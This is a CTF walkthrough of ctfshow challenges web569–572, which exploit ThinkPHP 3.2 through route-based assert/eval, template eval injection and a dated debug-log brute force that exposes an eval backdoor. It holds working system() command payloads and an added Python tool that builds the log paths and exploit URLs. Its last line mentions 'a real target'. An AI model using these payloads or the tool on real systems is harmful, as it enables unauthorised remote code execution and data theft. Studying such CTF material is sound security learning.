Contents
①web569
②web570
③web571
④web572
①web569
Basic recon: the admin login route
/index.php/Admin/Login/ctfshowLogin
②web570
Hint: find the route.
Look at the attached source (config.php).
It defines a route rule that can execute code: in effect, the two path segments after /ctfshow/ are used as a function name and its argument, so the path below amounts to assert('eval($_POST[1])'), which evaluates whatever we POST.
/index.php/ctfshow/assert/eval($_POST[1])
POST body: 1=system('tac /f*');
This relies on assert() evaluating a string argument, which PHP 7 still does (PHP 8 removed it); the glob /f* reads the flag file without having to know its exact name.
③web571
Hint: the controller.
Look at the source (IndexController.class.php).
index() takes a parameter $n
and passes it to show()
follow it:
show() calls display()
keep following:
display() calls fetch()
In fetch() the template content is run with eval('?>'.$content), and $content is the value we control. The leading ?> closes PHP mode first, so the injected value is emitted as plain output unless it opens a PHP tag itself, which is why the payload wraps the command in <?= ... ?>.
payload:
/index.php/home/index/index?n=<?=system('tac /f*');?>
④web572
The challenge hints at brute force with at most 365 attempts (the number of days in a year).
With APP_DEBUG enabled, ThinkPHP 3.2 writes one log file per day under the Runtime directory, and plenty of deployments never turn debug off. The layout is Application/Runtime/Logs/Home/yy_mm_dd.log (two-digit year, month, day), so a year's worth of filenames is exactly the 365 guesses the hint allows.
Brute force the date with Burp Intruder.
Requesting /Application/Runtime/Logs/Home/21_04_15.log
returns the log:
[ 2021-04-15T14:49:32+08:00 ] 127.0.0.1 /index.php?showctf=%3C?php%20phpinfo();?%3E
INFO: [ app_init ] --START--
INFO: Run Behavior\BuildLiteBehavior [ RunTime:0.000039s ]
INFO: [ app_init ] --END-- [ RunTime:0.000738s ]
INFO: [ app_begin ] --START--
INFO: Run Behavior\ReadHtmlCacheBehavior [ RunTime:0.000712s ]
INFO: [ app_begin ] --END-- [ RunTime:0.000868s ]
INFO: [ view_parse ] --START--
INFO: [ template_filter ] --START--
INFO: Run Behavior\ContentReplaceBehavior [ RunTime:0.000071s ]
INFO: [ template_filter ] --END-- [ RunTime:0.000204s ]
INFO: Run Behavior\ParseTemplateBehavior [ RunTime:0.008833s ]
INFO: [ view_parse ] --END-- [ RunTime:0.009135s ]
INFO: [ view_filter ] --START--
INFO: Run Behavior\WriteHtmlCacheBehavior [ RunTime:0.000468s ]
INFO: [ view_filter ] --END-- [ RunTime:0.000591s ]
INFO: [ app_end ] --START--
INFO: Run Behavior\ShowPageTraceBehavior [ RunTime:0.000964s ]
INFO: [ app_end ] --END-- [ RunTime:0.001181s ]
The first request line reveals an arbitrary code execution backdoor: /index.php?showctf= (the logged value %3C?php%20phpinfo();?%3E decodes to <?php phpinfo();?>, so the parameter is clearly fed to eval()).
payload:
/index.php?showctf=<?= system('tac /f*')?>
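The two steps above (guess the dated log filename, then pull the request lines out of the debug log) as an added Python example; this is not part of the original writeup. It generates the 365 candidate log paths newest first, parses ThinkPHP request lines, flags any parameter whose decoded value contains a PHP open tag, and builds the URL-encoded payload for the parameter it finds. The sample log is constructed from the request line above plus a benign request and two INFO lines; LOG_DIR, LOG_DATE and the helper names are my own.

```python
import re
from datetime import date, timedelta
from urllib.parse import quote_plus, unquote_plus, urlsplit

# ThinkPHP 3.2 writes per-module debug logs as Runtime/Logs/<Module>/yy_mm_dd.log
LOG_DIR = "/Application/Runtime/Logs/Home"
# The day the challenge log was written (assumed end of the brute-force window).
LOG_DATE = date(2021, 4, 15)

# Request lines look like "[ <ISO timestamp> ] <client ip> <request uri>";
# the INFO: timing lines that follow each request carry no request data.
REQUEST_RE = re.compile(r"^\[ (?P<ts>[^\]]+) \] (?P<ip>\S+) (?P<uri>\S+)$")
# A PHP open tag inside a decoded parameter value is the tell for an eval() sink.
PHP_TAG_RE = re.compile(r"<\?(?:php\b|=)", re.IGNORECASE)

# Constructed sample: the real request line from the log above, a benign request,
# and two of the INFO lines the parser must skip.
SAMPLE_LOG = """\
[ 2021-04-15T14:49:32+08:00 ] 127.0.0.1 /index.php?showctf=%3C?php%20phpinfo();?%3E
INFO: [ app_init ] --START--
INFO: Run Behavior\\BuildLiteBehavior [ RunTime:0.000039s ]
[ 2021-04-15T14:50:01+08:00 ] 10.0.0.5 /index.php/home/index/index?n=hello
INFO: [ app_end ] --END-- [ RunTime:0.001181s ]
"""


def candidate_log_paths(end, days=365):
    """Log paths for `days` days ending at `end`, newest first (365 = the hint's cap)."""
    return [
        f"{LOG_DIR}/{(end - timedelta(days=i)).strftime('%y_%m_%d')}.log"
        for i in range(days)
    ]


def split_query(query):
    """Decode a query string, splitting only on '&' so ';' inside PHP code survives."""
    params = {}
    for pair in query.split("&"):
        if not pair:
            continue
        name, _, value = pair.partition("=")
        params.setdefault(unquote_plus(name), []).append(unquote_plus(value))
    return params


def parse_requests(log_text):
    """One dict per logged request: timestamp, client ip, path and decoded params."""
    entries = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line.strip())
        if not m:
            continue
        parts = urlsplit(m["uri"])
        entries.append({
            "ts": m["ts"],
            "ip": m["ip"],
            "path": parts.path,
            "params": split_query(parts.query),
        })
    return entries


def find_code_injection(entries):
    """(path, parameter, decoded value) for every parameter carrying a PHP open tag."""
    hits = []
    for e in entries:
        for name, values in e["params"].items():
            for v in values:
                if PHP_TAG_RE.search(v):
                    hits.append((e["path"], name, v))
    return hits


def build_payload(path, param, cmd):
    """URL for the sink found in the log: a short-echo tag running `cmd` via system()."""
    code = f"<?= system('{cmd}')?>"
    return f"{path}?{param}={quote_plus(code)}"


if __name__ == "__main__":
    for p in candidate_log_paths(LOG_DATE, 3):
        print("try:", p)
    for path, param, value in find_code_injection(parse_requests(SAMPLE_LOG)):
        print(f"sink: {path}?{param}=  (seen: {value!r})")
        print("payload:", build_payload(path, param, "tac /f*"))
```

Point the path generator at a real target by requesting each candidate until one returns 200; the hint's 365-day cap is the whole list, so anything older than a year is out of scope anyway.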